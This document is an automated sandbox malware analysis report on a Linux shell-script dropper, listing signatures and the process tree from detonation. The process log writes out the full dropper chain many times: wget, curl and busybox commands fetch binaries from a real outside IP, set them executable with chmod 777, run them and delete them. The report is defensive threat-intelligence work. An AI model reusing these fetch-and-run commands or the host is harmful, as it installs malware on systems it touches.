Malware Analysis Report

2025-04-03 19:04

Sample ID 241121-bgmpmaxlgv
Target 2867f6118ccdde38169e7da22f50cedd.bin
SHA256 7a530aad038bbecbf77ba76fbb1d21207ddaada0b487c2ec2ae30bb52e362c1a
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7a530aad038bbecbf77ba76fbb1d21207ddaada0b487c2ec2ae30bb52e362c1a

Threat Level: Shows suspicious behavior

The file 2867f6118ccdde38169e7da22f50cedd.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 01:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 01:07

Reported

2024-11-21 01:09

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

28s

Max time network

129s

Command Line

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A

Processes

/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

